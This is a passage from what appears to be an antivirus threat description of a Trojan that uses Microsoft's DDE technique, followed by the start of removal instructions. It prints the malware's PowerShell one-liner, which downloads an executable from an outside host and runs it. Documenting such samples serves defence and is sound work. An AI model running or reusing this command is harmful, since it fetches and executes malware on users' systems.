It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

This Trojan does the following:

  • It uses powershell to download and execute a malicious file: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://frontiertherapycenter.com/16.exe','C:\Users\PEWPEW~1\AppData\Local\Temp\tvs.exe');Start-Process 'C:\Users\PEWPEW~1\AppData\Local\Temp\tvs.exe'
  • It contains the following details luring users to execute the download routine:

  • It uses Microsoft's Dynamic Data Exchange (DDE) technique.

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
